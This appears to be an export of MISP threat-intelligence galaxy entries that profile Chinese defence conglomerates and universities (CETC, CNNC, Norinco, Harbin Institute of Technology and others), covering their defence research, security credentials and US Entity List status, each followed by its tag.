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China Electronics Technology Group Corporation (中国电子科技集团公司)

CETC is a state-owned defence conglomerate that specialises in dual-use electronics. The company was established in 2002 by bringing dozens of research institutes administered by the Ministry of Information Industry, the predecessor to the Ministry of Industry and Information Technology, under one umbrella. CETC is one of the world's largest defence companies. It claims to have 523 subordinate units and companies and 160,000 employees. CETC divides its defence electronics products into seven categories: air base early warning, integrated electronic information systems, radar, communication and navigation, electronic warfare, UAVs and integrated IFF (identification, friend or foe). CETC also provides technology used for human rights abuses in Xinjiang, where approximately 1.5m are held in re-education camps. Several CETC research institutes and subsidiaries have been added to the US Government's entity list, restricting exports to them on national security grounds. CETC has been implicated by the US Department of Justice in at least three cases of illegal exports. CETC has a large international market and has also expanded its international research collaboration in recent years. It has a European headquarters in Graz, Austria, and has invested in the University of Technology Sydney.

The tag is:  
misp-galaxy:china-defence-universities="China Electronics Technology Group Corporation (中国电子科技集团公司)"

Table 597. Table References
China National Nuclear Corporation (中国核工业集团有限公司)

CNCC is the leading state-owned enterprise for China’s civilian and military nuclear programs. It consists of more than 200 subordinate enterprises and research institutes, many of which are listed on the Nuclear Threat Initiative website. In 2018, CNNC took over China’s main nuclear construction company, China Nuclear Engineering and Construction Group (中国核工业建设集团). The company is organized into eight industrial sectors, including nuclear power, nuclear power generation, nuclear fuel, natural uranium, nuclear environmental protection, application of nuclear technologies, non-nuclear civilian products and new energy sources. CNNC is mainly engaged in research and development, design, construction and production operations in the fields of nuclear power, nuclear fuel cycle, nuclear technology application, and nuclear environmental protection engineering. Because of the dual-use nature of nuclear technologies, the nuclear industry is a typical military-civil fusion industry. Naval nuclear power technology and nuclear reactor technology in the reactor core, fuel assembly, safety and security, and radioactive waste treatment all use the same or very similar processes. In March 2019, CNNC established an military-civil fusion fund dedicated to dual-use nuclear technology research and design. Two CNNC subsidiaries have been added to the US Government’s Entity List, restricting exports to them on national security grounds. CNNC has cooperated with U.S. Westinghouse Electric to construct AP1000 nuclear power plants. The company also has a significant overseas presence, signing agreements for joint research with U.S., French, Canadian, U.K., Russian and Argentinian companies.

The tag is: `misp-galaxy:china-defence-universities="China National Nuclear Corporation (中国核工业集团有限公司)"`

China North Industries Group (中国兵器工业集团公司)

Norinco Group was established in 1999 as a state-owned defence conglomerate devoted to the development and production of armaments for Chinese and foreign defence customers. Its main defence products include artillery and tear gas, air defence and anti-missile systems, anti-tank missiles and precision-guided munitions as well as armoured vehicles such as main battle tanks and infantry combat vehicles. Bloomberg reports that Norinco Group's civilian products include various engineering services and heavy-duty construction equipment. Norinco Group employs over 210,000 personnel, has revenues exceeding US$68.8 billion and is listed on the Fortune 500. Norinco Group has hundreds of subsidiaries and subordinate research institutes in China and around the world that have been catalogued by the International Peace Information Service and Omega Research Foundation in their working paper on the company and on Norinco Group's website. Norinco Group's Institute of Computer Application Technology (中国兵器工业计算机应用技术研究所) was one of the first adopters of internet technology and remains a leading company for research into network security. The institute hosts four internet research centres and is reported to work with the

The tag is: misp-galaxy:china-defence-universities="China North Industries Group (中国兵器工业集团公司)"

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**China People’s Police University (中国人民警察大学)**

The China People's Police University is an institution of higher learning devoted to training active duty police officers and firefighters in command and management as well as specialist technical officers. The curriculum is separated into two main streams, one for police officers and the other for firefighters. Its police disciplines include immigrant management, entry-exit and border control management, security intelligence, cyber-security, and political work. Its firefighting disciplines include firefighting engineering, electronic information engineering, and nuclear and biochemical fire control. Research facilities at the university include:

The tag is: misp-galaxy:china-defence-universities="China People’s Police University (中国人民警察大学)"

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**China Shipbuilding Industry Corporation (中国船舶重工集团有限公司)**

CSIC was established as one of China’s primary state-owned defence companies on 1 July 1999. CSIC is the PLA Navy's largest supplier of weapons platforms, accounting for nearly 80 per cent of all armaments. CSIC's signature products include conventional and nuclear submarines, warships and torpedoes, as well as the Liaoning aircraft carrier program. CSIC maintains a civilian shipbuilding program alongside its program of supplying the PLA Navy. CSIC's civilian work includes the production of oil and chemical tankers, container ships, bulk carriers and engineering ships. On 2 July 2019, it was announced that CSIC and the China State Shipbuilding Corporation would merge. According to Janes Defence Weekly, ‘the two groups, which have combined assets of about USD120 billion and employ 240,000 people, dominate naval shipbuilding in China and between them operate 160 subsidiaries.’ Nikkei has listed some of CSIC’s main subsidiaries here.

The tag is: misp-galaxy:china-defence-universities="China Shipbuilding Industry Corporation (中国船舶重工集团有限公司)"

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China South Industries Group (中国兵器装备集团有限公司)

CSGC is a leading producer of armaments for the People’s Liberation Army. It was founded in 1999 and works on technologies such as advanced munitions, mobile assault weapons, lights armaments, information optoelectronics and counter-terrorism equipment. CSGC also maintains civilian product lines focused on the oil and energy sector, but most of the company's attention goes to developing armaments. The company employs nearly 200,000 personnel, its revenue approaches USD34 billion (AUD50 billion) and it is listed as a Fortune 500 company. CSGC holds a controlling share in more than 60 subsidiaries. 32 of these are listed on the company's website.

The tag is: **misp-galaxy:china-defence-universities**="China South Industries Group (中国兵器装备集团有限公司)"

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China State Shipbuilding Corporation (中国船舶工业集团有限公司)

CSCC was established as one China’s primary state-owned weapons companies on 1 July 1999 to build ships for military and civilian customers. CSSC markets itself as as the ‘backbone’ of the Chinese navy and its core products include a variety of warships and support vessels. Alongside its program supporting the PLA Navy, Bloomberg notes that CSSC ‘produces oil tankers, bulk carriers, conditioner vessels, deepwater survey ships, and marine equipment.’ On 2 July 2019, it was announced that the China Shipbuilding Industry Corporation and the CSSC would merge. According to Jane's Defence Weekly, ‘the two groups, which have combined assets of about USD120 billion (AUD178 billion) and employ 240,000 people, dominate naval shipbuilding in China and between them operate 160 subsidiaries.’

The tag is: **misp-galaxy:china-defence-universities**="China State Shipbuilding Corporation (中国船舶工业集团有限公司)"

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China University of Geosciences (Wuhan) (中国地质大学)

CUG is subordinate to the Ministry of Education and also supervised by China’s Ministry of Land and Resources. It is actively engaged in defence research and training on geology, hosting the defence-focused Ministry of Education Key Laboratory on Geological Exploration and Evaluation. The laboratory was established in 2018, has 56 staff, and trains students in ‘military geology’. CUG gained secret-level security credentials in 2009, enabling it to participate in classified defence projects.

The tag is: **misp-galaxy:china-defence-universities**="China University of Geosciences (Wuhan) (中国地质大学)"
China University of Mining and Technology (中国矿业大学)

CUMT is subordinate to the Ministry of Education and specialises in engineering and other mining and industry-related disciplines. It engages in low levels of defence research. CUMT's defence research revolves around manufacturing and design, materials science, control science, electronic components, power and energy, and bionics. It appears to be involved in the construction and design of underground bunkers for the military. The academic committee of its State Key Laboratory for Geomechanics and Deep Underground Engineering (深部岩石力学与地下工程国家红点实验室) is headed by PLA underground engineering expert Qian Qihu (钱七虎).

The tag is: mipsgalaxy:china-defence-universities="China University of Mining and Technology (中国矿业大学)"

Chinese Academy of Engineering Physics (中国工程物理研究院)

CAEP was founded in 1958 and now has over 24,000 employees. It is headquartered in Mianyang, Sichuan Province, but also has facilities in Chengdu and Beijing. Notably, Mianyang is home to a military-civil fusion (MCF) demonstration base—the Sichuan Mianyang High-Technology City. Sichuan Military District Commander Jiang Yongshen (姜永申) in 2016 stressed the important role that Mianyang plays in China's larger science and technology development and the significance of its military-civil fusion (MCF) demonstration base. The academy is best known for nuclear weapons, but also carries out research on directed-energy weapons. CAEP's four main tasks are to develop nuclear weapons, research microwaves and lasers for nuclear fusion ignition and directed-energy weapons, study technologies related to conventional weapons, and deepen military-civil fusion. It claims that its research covers 260 specialising, primarily in the broad areas of physics and mathematics, mechanics and engineering, materials and chemistry, electronics and information, and optics and electrical engineering. CAEP hosts part of the Tianhe-2 supercomputer, one of the world's fastest supercomputers. Despite the sensitivity of its work, CAEP has expanded its international presence in recent years. It claims to send hundreds of scientists overseas to study or work as visiting scholars. CAEP has also used Chinese government talent recruitment schemes such as the Thousand Talents Plan to recruit dozens of scientists from abroad. By 2015, CAEP had recruited 57 scholars through the Thousand Talents Plan, making it one of the largest recruiters of Thousand Talents Plan scholars. CAEP maintains strong collaborative relationships with Chinese civilian universities. It runs a joint laboratory with the University of Electronic Science and Technology of China and collaborates with universities and research institutions including the Chinese Academy of Sciences, the University of Science and Technology of China, Shandong University, Southwest University of Science and Technology, Sichuan University, Jilin University, Peking University and Tsinghua University. CAEP sponsors postgraduate students in many of these
institutions who are required to work there for five years after graduating.

The tag is: *misp-galaxy:china-defence-universities=*"Chinese Academy of Engineering Physics (中国工程物理研究院)"

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**Chongqing University (重庆大学)**

CQU is a leading Chinese research institution subordinate to the Ministry of Education. Chongqing University is home to at least two laboratories devoted to defence research on nanotechnology and control systems. An institution accredited to conduct classified research, Chongqing University is active in improving its security culture with respect to the safeguarding of official secrets. In December 2016, the Ministry of Education entered an agreement with defence industry agency SASTIND to advance military-civil fusion at Chongqing University. Following this agreement, Chongqing University established the defence-focused Ministry of Education Key Laboratory for Complex Systems Safety and Autonomous Control, which works on control systems engineering in May 2018.

The tag is: *misp-galaxy:china-defence-universities=*"Chongqing University (重庆大学)"

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**Chongqing University of Posts and Telecommunications (重庆邮电大学)**

CQUPT is involved in research on wireless network engineering and testing, next-generation wideband wireless communication, computer networking and information security, intelligent information processing, advanced manufacturing, micro-electronics and specialized chip design. It ranks among the top 100 universities in China for science and technology. The university is supervised by the Ministry of Industry and Information Technology and the Chongqing Municipal Government. It holds secret-level security credentials, allowing it to participate in classified defence technology projects.

The tag is: *misp-galaxy:china-defence-universities=*"Chongqing University of Posts and Telecommunications (重庆邮电大学)"

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Chongqing University of Technology (重庆理工大学)

CQUT is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in armament science—the ‘B’ in ‘B8’ stands for the Chinese word for armaments, bingqi (兵器). However its involvement in defence research does not appear as expansive as the other B8 members and it is a relatively low-ranked university. In 2017, its president stated that ‘Chongqing is an important site for the weapons industry, but its military-industrial research and development ability has not yet upgraded.’ Unlike the other members of the B8, SASTIND does not appear to supervise the university. The university has links to Norinco Group and China South Industries Group, China’s largest weapons manufacturers, and was under the supervision of the conglomerates’ predecessor, China Ordnance Industry Corporation, until 1999. In 2017 and 2018, it signed a partnerships with four local defence companies to collaborate on research and training. In 2011, CQUT received secret-level security credentials, enabling it to participate in classified defence projects.

The tag is: misp-galaxy:china-defence-universities="Chongqing University of Technology (重庆理工大学)"

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Commercial Aircraft Corporation of China (中国商用飞机有限责任公司)

COMAC was established in 2008 as a state-owned manufacturer of large commercial aircraft. The company oversees eleven subsidiaries that focus on various aspects of aircraft production. A list of COMAC’s subordinate companies can be found in English on the company’s website. Despite its focus on commercial aircraft, China’s Ministry of Industry and Information Technology has referred to it as a defence industry conglomerate. The company maintains strong links to China’s defence industry and some of its leadership is drawn from former executives at state-owned military aircraft and missile manufacturers. China’s leading producer of military aircraft, the Aviation Industry Corporation of China (AVIC), also holds a 10 per cent share in COMAC. COMAC supports the continued development of China’s defence industry by awarding ‘national defence technology scholarships’ to Chinese university students. COMAC’s signature passenger aircraft, the C919, offers an example of how the company could use its civilian aircraft production for military purposes. Numerous Chinese analysts have studied Boeing’s conversion of the 737 into the P-8 Poseidon and E-7A surveillance aircraft and argue that the C919 could also be retrofitted for early warning as well as anti-surface and anti-submarine warfare missions. With a greater flight range than China’s other military aircraft, a retrofitted C919 for maritime surveillance operations could reduce China’s dependence on artificial air bases in the South China Sea which currently render aircraft vulnerable to corrosion due to harsh weather conditions. Vice-Chairman of the Central Military Commission, Zhang Youxia, reportedly expressed an interest in learning from American companies in converting civilian aircraft into military aircraft while inspecting COMAC’s C919.

The tag is: misp-galaxy:china-defence-universities="Commercial Aircraft Corporation of China (中国商用飞机有限责任公司)"
Criminal Investigation Police University of China
(中国刑事警察学院)

CIPUS was founded in May 1948 and underwent several name changes, but was upgraded in 1981 to become the first police university offering a specialised undergraduate degree program. It runs a national engineering laboratory, two MPS key laboratories, and provincial key laboratories. It is focused on training in criminal investigation, criminology science and technology and criminal law. The university also has relationships with companies that provide the technological tools that contribute to the PRC's public security apparatus. For instance, it has a relationship with the company Haiyun Data on public security intelligence. Haiyun provides data visualization services for MPS bureaus across China.

The tag is: `misp-galaxy:china-defence-universities="Criminal Investigation Police University of China (中国刑事警察学院)"`

Dalian Minzu University (大连民族大学)

DLMU was established in 1984 as an institution that researches China’s ethnic minorities. The university is overseen by the State Ethnic Affairs Commission (SEAC), the Liaoning Provincial Government and the Dalian Municipal Government. Scientific disciplines taught by DLMU include communications and information engineering, machine engineering, civil engineering and environmental science. DLMU also researches political thought and minority groups of northeast China. DLMU currently hosts the Dalian Key Lab of Digital Technology for National Culture (大连市民族文化数字技术重点实验室). Researchers at laboratory carry out research on facial recognition of ethnic minorities. The laboratory has collaborated with an academic from Curtin University on research related to the facial recognition of Tibetans, Koreans and Uyghurs—over one million of whom have disappeared into re-education camps. DLMU researchers are working on a database of facial and optical movements across different ethnic groups. DLMU also hosts the State Ethnic Affairs Commission Key Laboratory of Intelligent Perception and Advanced Control (国家民委智能感知与先进控制重点实验室), housed within the university's College of Electromechanical Engineering (机电工程学院). The laboratory has done work on convolutional neural networks for visual image recognition, which could have applications for surveillance technology. DLMU’s party committee has an active United Front Work Department. The department supervises non-CCP members and students returning from overseas study. Management of religious and ethnic minorities are likely to be other priorities for the department.

The tag is: `misp-galaxy:china-defence-universities="Dalian Minzu University (大连民族大学)"`
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**Dalian Naval Academy (中国人民解放军海军大连舰艇学院)**

The Dalian Naval Academy is one of the main training colleges for junior officers and cadets in the PLA Navy. The academy focuses on maritime navigation technology, communications engineering, electronic information engineering, weapons systems engineering, surveying and control science. Scientists from the Dalian Naval Academy produce publications on a variety of defence topics, including:

The tag is: *misp-galaxy:china-defence-universities=*“**Dalian Naval Academy (中国人民解放军海军大连舰艇学院)**”

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**Dalian University of Technology (大连理工大学)**

DLUT is directly under the administration of the Ministry of Education. In 2018, it came under the supervision of defence industry agency SASTIND as part of the government's efforts to deepen military-civil fusion in the university sector. In 2006, the university received secret-level security credentials, allowing it to participate in classified defence technology projects. Since then, it has expanded cooperation with the PLA Navy and joined several military-civil fusion innovation alliances. In 2015, the university established a defence laboratory in the School of Mechanical Engineering. The laboratory was proposed by a professor within the University's Institute of Science and Technology. The Institute of Science and Technology is primarily responsible for high-tech project management, where they manage projects for the 973 Program, the National Natural Science Foundation, and the Ministry of Education.

The tag is: *misp-galaxy:china-defence-universities=*“**Dalian University of Technology (大连理工大学)**”

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**Donghua University (东华大学)**

DHU is subordinate to the Ministry of Education. It is actively involved in defence research on materials. It hosts the Key Laboratory of High Performance Fibers & Products, a defence-focused laboratory involved in materials science and textiles engineering research for China’s defence industry and weapons systems. The laboratory is specifically involved in developing materials for weapons casings, vehicular armour, aviation and cabling. The university holds secret-level security credentials, allowing it to participate in classified defence research projects. DHU claims that much
of its research has been applied to fields such as defence technology and aviation, and contributed towards China’s space program and Beidou satellite navigation system. In 2018, the university signed a strategic cooperation agreement with the state-owned Jihua Group (际华集团) for collaboration on textiles to meet the military's needs.

The tag is: misp-galaxy:china-defence-universities="Donghua University (东华大学)"

### East China University of Technology (东华理工大学)

ECUT was founded in 1956 as the first institution of higher education for China’s nuclear industry. Since 2001, it has been subject to four ‘joint construction’ agreements between the Jiangxi Provincial Government and defence industry agency SASTIND or its predecessor COSTIND. These agreements are designed to develop the university's involvement in defense-related research and training. The Ministry of Natural Resources and defence conglomerate China National Nuclear Corporation are also involved in supervising and supporting ECUT. ECUT carries out defence research related to nuclear science and hosts a defence laboratory on radioactive geology. It holds secret-level security credentials, allowing it to participate in classified defence technology projects. In 2006, the East China University of Technology National Defence Technology Institute (东华理工大学国防科技学院) was established.

The tag is: misp-galaxy:china-defence-universities="East China University of Technology (东华理工大学)"

### Engineering University of the CAPF (中国人民武装警察部队工程大学)

The Engineering University of the CAPF is an institution devoted to training personnel in China’s paramilitary service, the People’s Armed Police, in command and engineering disciplines. The university focuses on paramilitary information engineering, paramilitary equipment technology, non-lethal weapons, military communications and mathematical cryptography. Students of the university can select majors from disciplines such as communications engineering, information security, military big data engineering, management science and engineering, and mechanical engineering. The Engineering University of the CAPF hosts the Key Military Laboratory for Non-Lethal Weapons (非致命武器全军重点实验室), the Big Data and Cloud Computing Laboratory (大数据与云计算实验室), and the Command Automation Training Centre (指挥自动化培训中心), indicating expertise in these areas. The Engineering University of the CAPF has collaborated significantly with a Beijing-based company called SimpleEdu (北京西普阳光教育科技股份有限公司), focusing primarily on social media and internet research. Below is a list of initiatives with which the Engineering University of the CAPF has collaborated:
Table 617. Table References

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**Fudan University (复旦大学)**

Fudan University is among China’s best universities. It was ranked 104th in the world by Times Higher Education in 2019. The university appears to engage high levels of work for the military on materials science, including stealth technology. All defence-related projects and matters in Fudan are managed by the university’s Institute of Special Materials and Technology (专用材料与装备技术研究院) and Defence Industry Secrets Committee (复旦大学军工保密委员会). The Institute of Special Materials and Technology specialises in defence research and works on simulations, precision manufacturing, and materials. Professor Ye Mingxin, the institute’s director, is also an advisor to the PLA and defence companies on materials science. Fudan University’s Materials Science Department includes one professor who is described as specifically being a ‘defence system professor’, which may refer to Professor Ye. In 2011, Fudan established a State Secrets Academy (国家保密学院), in partnership with China’s National Administration of State Secrets Protection (国家保密局). The institute carries out research and training on the protection of state secrets.

The tag is: *misp-galaxy:china-defence-universities="Fudan University (复旦大学)"*

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**Fuzhou University (福州大学)**

Fuzhou University is overseen by the Fujian Provincial Government and a focus on engineering disciplines. It does not appear to engage in significant levels of defence research. However, the Fuzhou University Military-Civil Fusion Innovation Research Institute (福州大学军民融合创新研究院) was jointly established in 2016 by Fuzhou University along with a number defence companies and military research institutions under the guidance of Fujian Provincial Government’s National Defence Industry Office (省国防科工办). Furthermore, the Fujian Provincial People’s Government and SASTIND entered an agreement to jointly develop the university as part of China’s military-civil fusion initiative in 2018. This indicates that the university will expand its involvement in defence research. The university has held second-class weapons R&D secrecy credentials since 2006.

The tag is: *misp-galaxy:china-defence-universities="Fuzhou University (福州大学)"*

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Guilin University of Electronic Science and Technology (桂林电子科技大学)

GUET specialises in electronics, communications and computer science. It engages in growing levels of defence research, indicated by the decision to place it under the joint administration of the defence industry agency SASTIND and the Guangxi Provincial Government in 2018. The PLA describes GUET as ‘Guangxi Province’s only university to have long carried out defence research.’ Areas of defence research at the university include communications technology, materials science, signals processing, microwaves, satellite navigation, and command and control. Since 2007, the university has held secret-level security credentials, enabling it to participate in classified weapons and defence technology projects.

The tag is:  
misp-galaxy:china-defence-universities="Guilin University of Electronic Science and Technology (桂林电子科技大学)"

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Hangzhou Dianzi University (杭州电子科技大学)

HDU specialises in information technology and has been jointly supervised by the Zhejiang Provincial Government and defence industry agency SASTIND since 2007. The university is Zhejiang Province's only provincial-level higher education institution to have officially designated national defence disciplines. HDU's leadership is closely integrated with its defence research. Since its creation in 2008, the university's main defence laboratory has been run by Xue Anke, who was the university's president until 2017. While president, Xue served on an expert advisory committee to the PLA on information technology. He is also a member of the Zhejiang Provincial Expert Committee on Artificial Intelligence Development. Key areas of defence research at HDU include electronics, artificial intelligence, military-use software, and communications and information systems. HDU has been expanding its research on artificial intelligence, establishing a school of artificial intelligence and an artificial intelligence research institute in 2018. HDU holds secret-level security credentials, allowing it to undertake classified weapons and defence technology projects. In 2011, the Zhejiang State Secrets Bureau established a State Secrets Academy in HDU. The academy, one of twelve in the country, trains personnel in managing and protecting confidential information.

The tag is:  
misp-galaxy:china-defence-universities="Hangzhou Dianzi University (杭州电子科技大学)"

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**Hangzhou Normal University (杭州师范大学)**

Hangzhou Normal University is a Chinese university subordinate to the Zhejiang Provincial Government. The university was initially established in 1978 as Hangzhou Normal College (杭州师院) to focus on teacher training, art education as well as research in the humanities and natural sciences. Hangzhou Normal University retains this broad academic focus and oversees faculties such as the Alibaba Business School (阿里巴巴商学院). Hangzhou Normal University collaborates with China’s MPS on the development of surveillance technology. In March 2019, the university entered into an agreement with the Zhejiang Police College, the Zhejiang Public Security Office, and Hikvision—China’s leading producer of video surveillance technology—to establish a joint laboratory. The joint laboratory reportedly focuses on applying big data analysis, cloud computing and internet of things technology to improve China’s policing capability.

The tag is: *misp-galaxy:china-defence-universities=*“Hangzhou Normal University (杭州师范大学)”

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**Harbin Engineering University (哈尔滨工程大学)**

HEU is one of China's top defence research universities. The university is a leading centre of research and training on shipbuilding, naval armaments, maritime technology and nuclear power. 36.46% of the university’s 2017 graduates who found employment were working in the defence sector. As one of the group of universities subordinate to the Ministry of Industry and Information Technology (MIIT) known as the ‘Seven Sons of National Defence’ (国防七子), HEU is an integral part of China’s defence industry. HEU’s achievements include producing China’s first experimental submarine, ship-based computer, and hovercraft. The university claims to have participated in most of the PLA Navy's submarine, undersea weapon, and warship projects. HIT’s role in the defence industry is highlighted by its formal affiliation with the PLA Navy, which became a supervising agency of the university in 2007. Under the supervisory agreement, the PLA Navy committed to developing HEU’s capacity as a platform for research and development in military technology and for training defence personnel. The following year, HEU established a Defence Education Institute to train reserve officers. Since then, the institute has trained at least 1,700 officers. HEU also maintains a joint laboratory with the PLA Navy Coatings Analysis and Detection Center. HEU is an important hub research on nuclear engineering, including on nuclear submarines. In 2018, it signed a co-construction agreement with defence conglomerate China National Nuclear Corporation (CNNC). In 2019, HEU and CNNC established the China Nuclear Industry Safety and Simulation Technology Research Institute. HEU also runs a joint laboratory on energetic materials (such as explosives) with the Chinese Academy of Engineering Physics, China's nuclear warhead research organisation.

The tag is: *misp-galaxy:china-defence-universities=*“Harbin Engineering University (哈尔滨工程大学)”

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213
Harbin Institute of Technology (哈尔滨工业大学)

HIT is one of China’s top defence research universities. As one of seven universities run by MIIT, it is known as one of the ‘Seven Sons of National Defence’ (国防七子). The Seven Sons of National Defence all have close relationships with the Chinese military and are core training and research facilities for China’s defence industry. In 2018, HIT spent RMB1.97 billion (AUD400 million)—more than half of its research budget—on defence research. 29.96% of the university’s graduates that year who found employment were working in the defence sector. HIT has been described by Chinese state media as having ‘defence technology innovation and weapons and armaments modernisation as its core’. It excels in satellite technology, robotics, advanced materials and manufacturing technology, and information technology. Other areas of defence research at HIT include nuclear technology, nuclear combustion, nuclear power engineering and electronic propulsion and thruster technology, many of which are officially designated as skill shortage areas for the Chinese defence industry. HIT is best known for its aerospace research and has a close relationship with China Aerospace Science and Technology Corporation (CASC), a state-owned defence company that specialises in long-range ballistic missile and satellite technology. Since 2008, HIT and CASC have operated a joint research centre. Defence conglomerates CASC, CASIC, AVIC and CETC rank among the top employers of HIT graduates. The university is a major source of cyber talent and receives funding for information security research from the MSS, China’s civilian intelligence agency. A report prepared for the US–China Security and Economic Review Commission identified it as one of four universities focused on research with applications in information warfare. In 2003, HIT founded its Information Countermeasures Technology Research Institute (哈尔滨工业大学信息对抗技术研究所).

The tag is: misp-galaxy:china-defence-universities="Harbin Institute of Technology (哈尔滨工业大学)"

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Harbin University of Science and Technology (哈尔滨理工大学)

HRBUST focuses on engineering, science, economics, management, philosophy, literature, law and education. In 2015, it was placed under the joint supervision of the Heilongjiang Provincial Government and SASTIND, which is an arrangement designed to develop the university’s involvement in defence-related research and training. HRBUST's relationship with SASTIND indicates that it will continue expanding its role in defence research. Currently, the university has at least four designated national defense disciplines and plans to build a national defense key laboratory. It holds secret-level security credentials.

The tag is: misp-galaxy:china-defence-universities="Harbin University of Science and Technology (哈尔滨理工大学)"

Table 625. Table References
Hebei University (河北大学)

Hebei University is Hebei Province’s only comprehensive university. The university subordinate to the Ministry of Education and also supervised by the Hebei Provincial Government and defence industry agency SASTIND. Its supervision by SASTIND, which began in 2013, is designed to support the university in ‘strengthening its national defence characteristics’. HBU appears to be relatively secretive about its defence research. In 2017, SASTIND designated an area of research at the university’s College of Physics Science and Technology as a ‘discipline with defence characteristics’. An article about this on the university’s news site has been taken down and deliberately did not specify the discipline. However, a speech given by the head of the college named military-use power and energy as HBU’s only defence discipline. The university holds secret-level security credentials, allowing it to participate in classified defence technology projects. In 2017, HBU held a forum on military-civil fusion for technology and innovation to ‘uncover the university’s potential for defence-industry technological research’ and encourage greater integration with defence companies.

The tag is: misp-galaxy:china-defence-universities=”Hebei University (河北大学)”

Table 626. Table References

Hebei University of Science and Technology (河北科技大学)

HEBUST engages in moderate but growing levels of defence research. It has been supervised by defence industry agency SASTIND since 2013, when SASTIND and the Hebei Provincial Government agreed to jointly develop the university’s involvement in defence research. By 2017, the university claimed to have completed 300 defence projects. The university holds secret-level security credentials, allowing it to participate in classified defence technology projects. While the university does not appear to have any dedicated defence laboratories, it has described five of its laboratories as platforms for defence research. Areas of materials science, mechanical engineering and control science at HEBUST have been designated ‘disciplines with national defence characteristics’ by SASTIND. HEBUST may also be pursuing greater integration between China’s defence needs and the university’s research on textiles engineering and biological fermentation. HEBUST states that it has developed close cooperation with China Electronics Technology Group Corporation’s 54th Research Institute, an organization blacklisted by the US Government Entity List. Defence industry conglomerate Aviation Industry Corporation of China also funds research at the university.

The tag is: misp-galaxy:china-defence-universities=”Hebei University of Science and Technology (河北科技大学)”

Table 627. Table References
Hefei University of Technology (合肥工业大学)

HFUT a leading Chinese university subordinate to the Ministry of Education. It specialises in engineering and engages in growing levels of defence research, particularly in the fields of advanced materials, smart manufacturing and electronic information. As of 2018, HFUT was the only civilian university in Anhui Province fully certified to carry out military projects, holding secret-level security credentials, and had undertaken over 200 such projects. In 2018, the university came under a 'joint-construction' agreement between the Ministry of Education and defence industry agency SASTIND. According to HFUT, this agreement 'will powerfully advance the university's development of national defence disciplines, training of talent for defence industry, and construction of defence industry and national defence research platforms.' Miao Wei, head of the Ministry of Industry and Information Technology, which oversees China’s defence industry, is a graduate of HFUT.

The tag is: `misp-galaxy:china-defence-universities="Hefei University of Technology (合肥工业大学)"`

Table 628. Table References

Links


Heilongjiang Institute of Technology (黑龙江工程学院)

HLJIT is an engineering-focused university that engages in growing levels of defence research. In 2015, the Heilongjiang Provincial Government partnered with defence industry agency SASTIND to expand the university's ability to 'show its national defence characteristics and serve the national defence science and technology industry.' SASTIND has designated military-use power and energy, optoelectronics and laser technology, and computing as three 'disciplines with national defence characteristics' at HLJIT. In June 2016, HLJIT and ZTE jointly launched an MOE-ZTE ICT Product-Teaching Integration Innovation Base (教育部-中兴通讯ICT产教融合创新基地) and established the Heilongjiang School of Engineering-ZTE Information and Communications Technology College (黑龙江工程学院-中兴信息通信技术学院). ZTE has been reportedly barred from US government contracts. As it increases its implementation of military-civil fusion, HLJIT has developed relationships with defence conglomerates. The university is particularly close to China Aerospace Science and Technology Corporation (CASC), a leading state-owned manufacturer of long-range missiles and satellites. In 2017, HLJIT partnered with a subsidiary of CASC to establish a joint research centre, the Aerospace Smart City Research Institute. The subsidiary, Aerospace Shenzhou Smart System Technology Co., Ltd. (航天神舟智慧系统技术有限公司), specialises in smart city and informatization technology. HLJIT holds confidential-level security credentials, allowing it to participate in confidential defence technology projects.

The tag is: `misp-galaxy:china-defence-universities="Heilongjiang Institute of Technology (黑龙江工程学院)"`

Table 629. Table References

Links

Heilongjiang University (黑龙江大学)

HLJU is supervised by the Ministry of Education, the Heilongjiang Provincial Government and SASTIND. SASTIND’s supervision of the university is designed to promote its integration with China’s defence technology goals. In 2016, the year after HLJU came under SASTIND’s supervision, the university received third-class security credentials and funding for a national defence technology research project for the first time. Third-class security credentials allow the university to participate in confidential defence research projects. By 2018, HLJU claimed to have received RMB13 million (AUD2.7 million) in defence research funding. HLJU has close ties with Russian universities and is best known for its work in the Chemistry, Chemical Engineering and Materials Department, which entered the top 1 percent of ESI’s global rankings.

The tag is: misp-galaxy:china-defence-universities="Heilongjiang University (黑龙江大学)"

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Henan University of Science and Technology (河南科技大学)

HAUST is Henan province’s leading civilian university for defence research. In 2008, it became the first university in the province to receive security credentials allowing it to participate in classified weapons projects. In 2016, it became the province’s only university subject to a ‘joint-construction’ agreement with defence industry agency SASTIND, an arrangement designed to increase HAUST’s involvement in defence research. As early as 2009, the university stated that it had made great contributions to the defence and aviation industries, undertaking large amounts of defence research projects. HAUST describes itself as China’s primary university for research and training for the mechanical bearings (such as ball bearings) industry. SASTIND has designated three areas of research at the university as ‘disciplines with defence characteristics’, covering systems engineering, materials science and mechanics. The university is actively involved in military-civil fusion activities. The university claims to have made important contributions to the development of bearings for aircraft engines, satellites, and spacecraft. It states that it has resolved critical technological problems for specific weapons guidance systems, ballistic missile testing systems and an infrared targeting and interference emulation system that are probably used to test guided missiles.

The tag is: misp-galaxy:china-defence-universities="Henan University of Science and Technology (河南科技大学)"

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Huazhong University of Science and Technology (華中科技大學)

HUST is one of China’s leading research institutions. While the university is subordinate to the Ministry of Education, it has also been supervised by the State Administration of Science, Technology and Industry for National Defense since 2012. The university hosts at least six laboratories dedicated to defence research. Its National Defence Research Institute reportedly oversees defence research in seven other HUST research centres. Artificial intelligence, shipbuilding, image processing, navigation technology, mechanical engineering, electronics, materials science and laser physics are focuses of HUST’s defence research. HUST has worked closely with the PLA and China’s defence industry. This collaboration includes the development of artificial intelligence and imaging technology for weapons. The university’s work on pulsed power is linked to China’s nuclear and directed-energy weapons program. China’s state-owned defence conglomerates and China’s nuclear warhead facility sponsor dozens of HUST postgraduate students each year, who are required to work at their sponsoring organisation for at least five years after graduating. HUST holds secret-level security credentials, allowing it to participate in research and production for classified weapons and defence projects.

The tag is: misp-galaxy:china-defence-universities="Huazhong University of Science and Technology (華中科技大學)"

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Hunan University (湖南大学)

HNU is a leading Chinese university subordinate to the Ministry of Education. In recent years, its participation in defence research appears to have grown substantially. In 2010, it established the National Supercomputer Center in Changsha jointly with the PLA National University of Defense Technology, which has since been placed on the US Government Entity List for its suspected role in nuclear weapons research. In 2011, China’s defence industry agency, SASTIND, entered a partnership with the MOE to expand the university’s participation in defence research and defence industry ties. This arrangement was renewed in 2016. In 2013, SASTIND and the Hunan Provincial Government also signed an agreement to jointly support the development of the university’s National Supercomputer Center. HNU holds secret-level security credentials, enabling it to participate in research and production for weapons and other defence projects.

